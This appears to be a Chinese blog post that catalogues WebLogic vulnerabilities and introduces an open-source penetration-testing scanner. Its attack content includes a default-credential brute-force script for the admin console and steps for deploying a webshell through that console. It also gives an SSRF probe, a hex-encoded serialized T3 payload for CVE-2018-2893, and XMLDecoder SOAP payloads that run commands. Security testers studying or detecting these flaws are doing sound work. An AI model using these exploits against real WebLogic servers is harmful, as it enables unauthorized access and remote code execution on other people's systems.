Weblogic漏洞——从入门到放弃

本文首先会为大家梳理几乎weblogic全部历史漏洞,在此基础上开源一个自己写的小平台,旨在为渗透测试工作者提供一个透明、高效的Weblogic中间件测试思路。

在渗透测试工作中,我们常常会遇到的各种版本的weblogic中间件,我们更多的情况是借助网上各种来源的poc/exp去进行测试,大家手头也确实积累了一些,例如针对wls模块,或针对t3协议啦,然而weblogic每年都会翻几次车,非开源工具的更新进度也一直是个谜,所以笔者希望可以系统性的整理一番,形成一个更加具体透明的测试流程,于是,就有了今天大家看到的文章与工具。

之所以命名为从入门到放弃,只是希望大家可以借助此次给大家开源的小工具,彻底解放自己,让weblogic漏洞测试可以不在迷茫,彻底杜绝测试发现Java反序列化漏洞却完全讲不出具体为何的尴尬。

__        __   _     _             _                    
\ \      / /__| |__ | | ___   __ _(_) ___     _     _   
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __|  _| |_ _| |_ 
  \ V  V /  __/ |_) | | (_) | (_| | | (__  |_   _ _   _|
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___|   |_|   |_|  
                             |___/    
                             
                             By Tide_RabbitMask | V 1.0 

在开始正文前,首先我们简单提一下weblogic当前比较活跃的几个较新的版本:

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
…………

按照本平台目录,给大家梳理一遍Weblogic历史漏洞:

#控制台路径泄露
Weakpassword  

#SSRF:
CVE-2014-4210   

#JAVA反序列化:
CVE-2015-4852  
CVE-2016-0638  
CVE-2016-3510   
CVE-2017-3248   
CVE-2018-2628 
CVE-2018-2893   

#任意文件上传
CVE-2018-2894   

#XMLDecoder反序列化:
CVE-2017-10271 
CVE-2017-3506

控制台路径泄露

包含模块:
Weakpassword

相关地址:
http://127.0.0.1:7001/console/login/LoginForm.jsp

控制台

关于控制台,唯一的突破就是弱口令,口令是人自定义的,所以难免会有疏漏出现。检测平台会检测默认路径是否存活,为了整体效率,并未在当前单线程版本加入爆破功能,大家可以借助以下脚本辅助爆破。

    def weakPasswd(self):
        """weak password"""

        pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
        for user in pwddict:
            for pwd in pwddict:
                data = {
                    'j_username':user,
                    'j_password':pwd,
                    'j_character_encoding':'UTF-8'
                }
                req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)

                if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                    print('[+] WebLogic username: '+user+'  password: '+pwd)

当然,如果有小伙伴想再次基础上优化,可以增加路径枚举功能,毕竟关于控制台默认路径的漏洞修复建议是:如果远程部署功能的确需要,建议修改默认的模块名称。
如果一旦成功进入控制台,则我们可以使用weblogic的远程部署功能上传webshell。
首先我们需要配置下木马,借助IDE打成war包:

木马打war包

如果不习惯Java IDE,可在linux下使用jar命令进行打包:
jar cvf ma.war ma/*

jar命令打包

然后借助控制台进行war包的远程部署:

远程部署
部署成功

可以通过以下模块对部署状态进行二次确认:

http://127.0.0.1:7001/wls-cat/index.jsp?action=summary&app=ma&module=ma.war

确认部署情况

部署完成后可通过项目部署路径访问webshell:

http://127.0.0.1:7001/ma/ma.jsp

SSRF:

包含模块:
CVE-2014-4210
涉及版本:
Version: 10.0.2,10.3.6

相关地址:
http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp

uddi

同样考虑网络延时的影响,平台只集成简单的路径检测:

def islive(ur,port):
    url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
    r = requests.get(url, headers=headers)
    return r.status_code

大家也可以替换成如下payload用于正则匹配校验,提高准确性:

    def ssrf(self):
        payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
        req = requests.get(self.url+payload, timeout=10, verify=False)
        if "weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and "IO Exception on sendMessage" not in req.text:
            print("[+] WebLogic ssrf")
正则匹配情况

JAVA反序列化:

包含模块:
CVE-2015-4852
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2628
CVE-2018-2893

这一部分内容是weblogic漏洞的重中之重,每一个CVE拿出来都可以单独成为一篇文章,反倒让我不知如何分析啦,在此推荐一篇freebuf文章。

相关文章:https://www.freebuf.com/vuls/179579.html

那么给大家补充一点自己的总结吧:

#CVE-2015-4852   
Weblogic 直接反序列化
是基于Weblogic t3协议引起远程代码执行的反序列化漏洞 

#CVE-2016-0638   
Weblogic 直接反序列化
基于Weblogic t3协议引起远程代码执行的反序列化漏洞
漏洞实为CVE-2015-4852绕过
拜Oracle一直以来的黑名单修复方式所赐

#CVE-2016-3510   
基于Weblogic t3协议引起远程代码执行的反序列化漏洞

#CVE-2017-3248   
基于Weblogic t3协议引起远程代码执行的反序列化漏洞  
属于Weblogic JRMP反序列化

#CVE-2018-2628   
基于Weblogic t3协议引起远程代码执行的反序列化漏洞 
属于 Weblogic JRMP反序列化

#CVE-2018-2893   
基于Weblogic t3协议引起远程代码执行的反序列化漏洞  
实为CVE-2018-2628绕过
同样拜Oracle一直以来的黑名单修复方式所赐   
属于Weblogic JRMP反序列化

大家应该也发现了,因为Oracle的黑名单修复策略,这种缝缝补补的故事还会继续下去。大家可以结合本文开源的平台中收录的poc对比一下,会发现因为这些poc其实十分相像。无非就是替换了下payload与正则匹配项。绝大部分poc借助tcp协议的socket实现而不是针对具体路径。
如最新的CVE-2018-2893:

VUL=['CVE-2018-2893']
#payload:
PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878']
#正则匹配规则:
VER_SIG=['StreamMessageImpl']

关于wls-wsat模块的漏洞,大家也可以在测试前,通过默认路径简单查看路径是否存在来进行初步判断。

相关地址:
http://127.0.0.1:7001/wls-wsat/CoordinatorPortType

地址截图

任意文件上传

包含模块:
CVE-2018-2894
涉及版本:
version:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3

相关地址:
http://127.0.0.1:7001/ws_utc/config.do
http://127.0.0.1:7001/ws_utc/begin.do

其实该漏洞的出现也确实令人匪夷所思,竟然开放了两个超高危的未授权上传界面,原理部分还是推荐一篇文章更权威些,该向大佬低头的时候绝不含糊。

相关文章:https://www.freebuf.com/vuls/178510.html

顺便一提的是,该未授权上传界面,CNCERT给出危害程度评分高达9.8分。

未授权文件上传

XMLDecoder反序列化:

包含模块:
CVE-2017-10271
CVE-2017-3506
涉及版本:
version:10.3.6.0,12.1.3.0,12.2.1.1,12.2.1.2

相关地址:
http://127.0.0.1:7001/wls-wsat/CoordinatorPortType

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

在上方8个路径中任意选择一个路径,将content-type改成text/xml类型
content-type:text/xml,然后改为post方式传入payload,即可漏洞复现,如果此处为修改类型,则会收到内容为不支持的类型的返回包。
在这里给大家提供两个payload:

#打开计算器poc,仅供验证
<soapenv:Envelope     xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
       <work:WorkContext    xmlns:work="http://bea.com/2004/06/soap/workarea/">
           <java      version="1.8" class="java.beans.XMLDecoder">
               <void     class="java.lang.ProcessBuilder">
                    <array    class="java.lang.String" length="3">
                        <void     index="0">
                           <string>calc</string>
                        </void>
                        <void     index="1">
                            <string></string>
                        </void>
                        <void     index="2">
                            <string> </string>
                        </void>
                    </array>
                <void     method="start"/></void>
           </java>
       </work:WorkContext>
   </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

然而,真正远程测试的时候,我们是无法看到计算器运行的,所以我们略微修改,通过返回包的正则进行判断漏洞是否存在。
正则匹配规则:\<faultstring\>.*\<\/faultstring\>

#远程验证payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
                <void index="2">
                  <string>whoami</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>

emmmm,避重就轻的给大家梳理了一遍weblogic的历史漏洞,可能还会有些遗漏,比如CVE-2018-3191,但接下来的版本我会补齐的。那么接下来给大家奉上V1.0版本的Weblogic++,也欢迎各位小伙伴对它进行更多的优化。

项目地址:https://github.com/rabbitmask/WeblogicR

简单嘟囔两句:因为套接字的使用,容易受到多种网络因素的影响,所以我对每一个模块单独做了异常处理,对收录的所有poc进行了接口和参数的统一,调整了多处bug,目前来讲,正常的渗透测试工作完全够用了,可能有两个poc还没有调整好,无伤大雅。emmmm,别的,,,tide牛逼!好哒,就这样~
奉上软件说明与使用截图:

软件作者:Tide_RabbitMask
感谢来自网络的开源POC,
我只是进行了魔改和接口统一。
免责声明:Pia!(o ‵-′)ノ”(ノ﹏<。)
本工具仅用于安全测试,请勿用于非法使用,要乖哦~
    
V 1.0功能介绍:
提供一键poc检测,收录几乎全部weblogic历史漏洞。
详情如下:
    #控制台路径泄露
    Weakpassword  
    
    #SSRF:
    CVE-2014-4210       
    
    #JAVA反序列化:
    CVE-2015-4852  
    CVE-2016-0638  
    CVE-2016-3510   
    CVE-2017-3248   
    CVE-2018-2628 
    CVE-2018-2893   
    
    #任意文件上传
    CVE-2018-2894   
    
    #XMLDecoder反序列化:
    CVE-2017-10271 
    CVE-2017-3506

其中几个exp功能完美,不忍魔改,
暂且请手动进行测试。
后期多进程版本再考虑exp的自动化。


V1.*功能预告:
    多进程并发
    修复建议
    模块优化
    交互优化 
    报告生成

软件使用Demo:   
==========================================================
__        __   _     _             _                    
\ \      / /__| |__ | | ___   __ _(_) ___     _     _   
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __|  _| |_ _| |_ 
  \ V  V /  __/ |_) | | (_) | (_| | | (__  |_   _ _   _|
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___|   |_|   |_|  
                             |___/    
                             
                             By Tide_RabbitMask | V 1.0 

Welcome To Weblogic++ !!

    1、开启POC检测
    2、开启EXP利用
    3、关于本软件

1
Please enter the IP:127.0.0.1
Please enter the port:7001
[*]开始控制台路径检测
[+]目标weblogic控制台地址暴露!
[+]路径为:http://127.0.0.1:7001/console/login/LoginForm.jsp
[+]请自行尝试弱口令爆破!
[*]开始SSRF检测
[+]目标weblogic存在UDDI组件!
[+]路径为:http://127.0.0.1:7001/uddiexplorer/
[+]请自行验证SSRF漏洞!
[*]开始CVE_2015_4852检测
[*]测试返回内容为:10.3.6.0.false
AS:2048
HL:19
[*]开始CVE_2016_0638检测
[+]目标weblogic存在JAVA反序列化漏洞:CVE-2016-0638
[*]开始CVE_2016_3510检测
[-]目标weblogic未检测到CVE-2016-3510
[*]开始CVE_2017_3248检测
[-]目标weblogic未检测到CVE-2017-3248
[*]开始CVE_2017_3506检测
[+]目标weblogic存在JAVA反序列化漏洞:CVE-2017-3506
[*]开始CVE_2018_2628检测
[+]目标weblogic存在JAVA反序列化漏洞:CVE-2018-2628
[*]开始CVE_2018_2893检测
[+]目标weblogic存在JAVA反序列化漏洞:CVE-2018-2893
[*]本次检测任务结束,目标 127.0.0.1:7001

==========================================================
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,468评论 5 473
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,620评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,427评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,160评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,197评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,334评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,775评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,444评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,628评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,459评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,508评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,210评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,767评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,850评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,076评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,627评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,196评论 2 341

推荐阅读更多精彩内容

  • [TOC] 一、 WebLogic安装 0. 概述 WebLogic是美国Oracle公司出品的一个applica...
    MrSquidward阅读 12,583评论 0 5
  • 今天偶然看到WebLogic WLS组件存在漏洞,本地搭建环境测试一下,复现报告只保证本人可以看懂 分隔符————...
    二潘阅读 2,306评论 2 1
  • 目前,Oracle Weblogic保持每个季度一个补丁包更新的速度,对于大规模使用weblogic中间件的系统来...
    zyxchaos阅读 3,013评论 0 0
  • 漏洞编号:CVE-2017-10271 受影响WebLogic版本: 10.3.6.0.0 12.1.3.0.0 ...
    __周__阅读 512评论 0 0
  • 世上没有什么命中注定,所谓命中注定,都基于你过去和当下有意无意的选择。 选择种善因,自得善果,果上又生因,因上又生...
    红颜江山阅读 617评论 0 1